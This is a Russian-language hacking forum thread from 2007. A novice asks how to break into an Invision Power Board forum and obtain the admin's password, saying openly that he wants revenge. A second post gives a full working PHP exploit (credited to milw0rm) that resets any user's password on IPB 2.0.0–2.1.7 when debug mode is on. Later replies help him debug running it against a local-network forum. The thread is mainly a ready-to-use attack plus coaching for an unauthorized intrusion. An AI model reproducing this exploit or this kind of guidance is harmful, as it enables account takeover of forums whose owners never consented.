HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Болталка
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Атака на Ipb + сниффер
  #1  
Старый 12.11.2007, 13:01
tick
Познающий
Регистрация: 10.11.2007
Сообщений: 36
С нами: 9737661

Репутация: 5
Question Атака на Ipb + сниффер

Здравствуйте!
У меня парочка вопросов...

1. Подскажите сниффер для локалки чтобы взломать IPB!?

2. Есть простой способ взлома IPB?

Я не очень соображаю в хакерстве тут...но хочеться поломать форум или же узнать login и password админа в IPB !
 
Ответить с цитированием

  #2  
Старый 12.11.2007, 13:12
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами: 9798146

Репутация: 1224


По умолчанию

хотя бы версию сказал
 
Ответить с цитированием

  #3  
Старый 12.11.2007, 13:15
tick
Познающий
Регистрация: 10.11.2007
Сообщений: 36
С нами: 9737661

Репутация: 5
По умолчанию

Цитата:
Сообщение от it's my  
хотя бы версию сказал
Русская версия Invision Power Board v2.1.7 © 2007 IPS, Inc.

И последнию! Но главно взломать ту которую выше указал...помогите народ пожалуйста я в этом деле воще мало что знаю...но отомстить я хочу!
 
Ответить с цитированием

  #4  
Старый 12.11.2007, 13:20
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами: 9798146

Репутация: 1224


По умолчанию

может поможет
PHP код:
<?php
/*

 Debug Mode password change vulnerability
 Affects Invision Power Borard 2.0.0 to 2.1.7
 by Rapigator
 
 This works if:

 "Debug Level" is set to 3
 or
 Enable SQL Debug Mode is turned on
 
 In General Configuration of the forum software.

*/

// The forum's address up to and including 'index.php'
$site "http://localhost/forums/index.php";

// An existing user's login name
$name "admin";

// The new password(3-32 characters)
$pass "1234";

// You can use a proxy...
// $proxy = "1.2.3.4:8080";



// -----------------------------
$site .= "?";
$suffix "";
$name urlencode($name);
$pass urlencode($pass);
$curl curl_init($site.'act=Reg&CODE=10');
curl_setopt($curlCURLOPT_PROXY$proxy);
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
curl_setopt($curlCURLOPT_TIMEOUT10);
$page curl_exec($curl);
curl_close($curl);
if (
preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/'$page$regs)) {
    
$prefix $regs[1];
    
$regid $regs[2];
    
$regcode $regs[3];
} else {
    
$suffix "&debug=1";
    
$curl curl_init($site.'act=Reg&CODE=10'.$suffix);
    
curl_setopt($curlCURLOPT_PROXY$proxy);
    
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
    
curl_setopt($curlCURLOPT_TIMEOUT10);
    
$page curl_exec($curl);
    
curl_close($curl);
    if (
preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/'$page$regs)) {
        
$prefix $regs[1];
        
$regid $regs[2];
        
$regcode $regs[3];
    }
}
if (!isset(
$regid) || !isset($regcode)) {
    echo 
"Error: Probably not vulnerable, or no forum found";
    exit;
}

$curl curl_init($site.$suffix);
curl_setopt($curlCURLOPT_PROXY$proxy);
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
curl_setopt($curlCURLOPT_POST1);
curl_setopt($curlCURLOPT_POSTFIELDS"act=Reg&CODE=11&member_name={$name}&regid={$regid}&reg_code={$regcode}");
curl_setopt($curlCURLOPT_TIMEOUT10);
$page curl_exec($curl);
curl_close($curl);
if (
preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/'$page$regs)) {
    
change_pass($regcode,$regid,$regs[1],$regs[2]);
}
if (
preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/'$page$regs)) {
    
change_pass($regcode,$regid,$regs[1],$regs[2]);
}

function 
change_pass($regcode,$regid,$vid,$userid) {
    global 
$site$proxy$name$pass;
    
$curl curl_init($site.$suffix);
    
curl_setopt($curlCURLOPT_PROXY$proxy);
    
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
    
curl_setopt($curlCURLOPT_POST1);
    
curl_setopt($curlCURLOPT_POSTFIELDS"act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}&regid={$regid}&reg_code={$regcode}&pass1={$pass}&pass2={$pass}");
    
curl_setopt($curlCURLOPT_TIMEOUT10);
    
$page curl_exec($curl);
    
curl_close($curl);
    echo 
"Password Changed!";
    exit;
}
?>

# milw0rm.com [2006-11-01]
 
Ответить с цитированием

  #5  
Старый 12.11.2007, 13:28
tick
Познающий
Регистрация: 10.11.2007
Сообщений: 36
С нами: 9737661

Репутация: 5
По умолчанию

хм...как я понял это php файл создать и это туда сунуть? Если так т оя сделал поставил VertrigoServ создал php файл твой код вставил запустил пишет "Error: Probably not vulnerable, or no forum found" что там чтонить менять надо в php в коде или тупо вставить?

(извени за тупость если что не так...спасибо что помогаеш)
 
Ответить с цитированием

  #6  
Старый 12.11.2007, 13:48
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами: 10077446

Репутация: 1020


По умолчанию

Как ты понимаеш варианта два:
либо ты не правильно указываешь адрес форума(он у тебя в локалке стоит, а есть ли у вас Dns сервак, если нету надо указать апи форума и путь), либо форум не "болеет" этим багом, что скорее всего, или не выполнется такое условие на серваке:
This works if:

"Debug Level" is set to 3
or
Enable SQL Debug Mode is turned on

Менять там нужно только прокси, он по дефолту выключен.

Последний раз редактировалось AkyHa_MaTaTa; 12.11.2007 в 13:51..
 
Ответить с цитированием

  #7  
Старый 12.11.2007, 14:12
tick
Познающий
Регистрация: 10.11.2007
Сообщений: 36
С нами: 9737661

Репутация: 5
По умолчанию

нету там dns там из ip типо http://192.168.4.24/forum что мне делать?
 
Ответить с цитированием

  #8  
Старый 12.11.2007, 14:58
tick
Познающий
Регистрация: 10.11.2007
Сообщений: 36
С нами: 9737661

Репутация: 5
По умолчанию

Акуна матата: Я без понятия....

it's my: Попробывал пишет: Error: Probably not vulnerable, or no forum found
Почитал то что ты сказал там сразу написал http://192.168.2.24/forum//ips_kernel/PEAR/ открылась типо ftp ну вот:

Index of /forum//ips_kernel/PEAR Name Last modified Size Description

Parent Directory -
Text/ 01-Nov-2007 22:49 -
lgpl.txt 18-Jul-2006 18:56 26K


Apache/2.2.4 (Win32) PHP/5.2.1 Server at 192.168.2.24 Port 80

Папка: Text,lgpl.txt - тут:::

GNU LESSER GENERAL PUBLIC LICENSE
Version 2.1, February 1999

Copyright (C) 1991, 1999 Free Software Foundation, Inc. ну и т.д
в папке text файлы: Diff.php,Diff3.php,lgpl.txt,package.xml там ещё папка Diff в ней Renderer.php и папка Renderer а в ней inline.php и unified.php

т.е. в папки какието могу заходить...это и есть уязвимость? что мне делать подскажи...

Последний раз редактировалось tick; 12.11.2007 в 15:03..
 
Ответить с цитированием

  #9  
Старый 13.11.2007, 07:01
j0nathan
Познающий
Регистрация: 13.07.2006
Сообщений: 65
С нами: 10436457

Репутация: 11
По умолчанию

Цитата:
Сообщение от tick  
Акуна матата: Я без понятия....

it's my: Попробывал пишет: Error: Probably not vulnerable, or no forum found
Почитал то что ты сказал там сразу написал http://192.168.2.24/forum//ips_kernel/PEAR/ открылась типо ftp ну вот:

Index of /forum//ips_kernel/PEAR
Хотя толку нет но всё равно попробуй в сплойте писать не
http://192.168.2.24/forum/
а без ключа в конце
http://192.168.2.24/forum
 
Ответить с цитированием

  #10  
Старый 12.11.2007, 14:22
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами: 9798146

Репутация: 1224


По умолчанию

а форум из инета виден:
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
streSS teSt Firewall'ов Elekt Защита ОС: вирусы, антивирусы, файрволы. 22 27.03.2009 19:43
скрипт распознавания форума genom-- Уязвимости CMS / форумов 22 31.12.2008 15:06
Ipb 1.3 Final vs Сниффер BlackSpider Уязвимости CMS / форумов 13 19.05.2006 14:58



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.